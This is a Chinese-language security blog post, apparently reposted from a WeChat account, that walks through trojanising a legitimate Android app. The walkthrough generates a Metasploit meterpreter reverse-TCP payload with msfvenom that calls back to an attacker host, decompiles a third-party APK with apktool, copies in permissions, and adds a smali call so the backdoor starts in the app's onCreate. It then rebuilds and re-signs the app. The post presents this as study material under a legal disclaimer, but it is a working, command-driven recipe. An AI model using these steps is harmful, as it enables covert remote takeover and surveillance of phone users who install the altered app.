Apk注入后门

admin
admin
admin
139110
文章
114
评论
2022年2月28日16:15:09评论1,221 views字数 1646阅读5分29秒阅读模式

Apk注入后门


△△△点击上方“蓝字”关注我们了解更多精彩




0x00 Preface [前言/简介]

以前一直好奇怎么在正常的apk中注入后门,今天算是整明白了
本文介绍使用apktool进行注入后门
大概思路如下,把木马注入到apk文件中,并把木马的启动代码添加到apk启动时调用代码处,只要对方启动apk,就能上线对方手机


0x01 正文
1、下载工具
https://ibotpeaches.github.io/Apktool/install/https://www.oracle.com/java/technologies/javase-jdk16-downloads.html
2、Msf生成apk后门
msfvenom -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=6663 -o 1.apk
Msf先开启监听测试是否能正常上线
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcppayload => android/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST x.x.x.xLHOST => x.x.x.xmsf6 exploit(multi/handler) > set LPORT 6663LPORT => 6663msf6 exploit(multi/handler) > exploit -z -j

Apk注入后门

能够正常上线,So,网上寻找一个app进行注入该后门,注:app需要可反编译
3、反编译APP
因为我这里用那个快捷的出了点问题,所有直接调用
java -jar apktool.jar d 1.apkjava -jar apktool.jar d kemi.apk

Apk注入后门

4、加上木马后门的权限
将<uses-permission 开头的复制到APP AndroidManifest.xml文件中

Apk注入后门

5、添加木马启动代码
在AndroidManifest.xml搜索Main和Launch关键词

Apk注入后门

/root/APP/kemi/smali/com/icomico/comi/activity/
搜索onCreat函数
添加启动代码

Apk注入后门

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
然后将木马文件中的metasploit文件夹移动到/root/APP/kemi/smali/com/中

Apk注入后门

6、回编译
java -jar apktool.jar b kemi

Apk注入后门

编译成功之后的文件在该文件夹

Apk注入后门

7、添加签名
生成签名keytool -genkey -v -keystore android.keystore -alias android.keystore -keyalg RSA -validity 20000添加签名bin/jarsigner -verbose -keystore android.keystore -signedjar 123_yqm.apk kemi.apk android.keystore

Apk注入后门

8、测试上线

Apk注入后门




0x02 Summary 总结
现如今,手机已经成为生活中必不可缺的,App的安装是我们需要进行注意的
像之前的裸聊诈骗,亦是如此

本篇文章仅供学习使用,切勿触犯法律!


END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

Apk注入后门

或添加NOVASEC-MOYU 以便于及时回复。

Apk注入后门


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!



本文始发于微信公众号(NOVASEC):Apk注入后门

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月28日16:15:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apk注入后门https://cn-sec.com/archives/494284.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息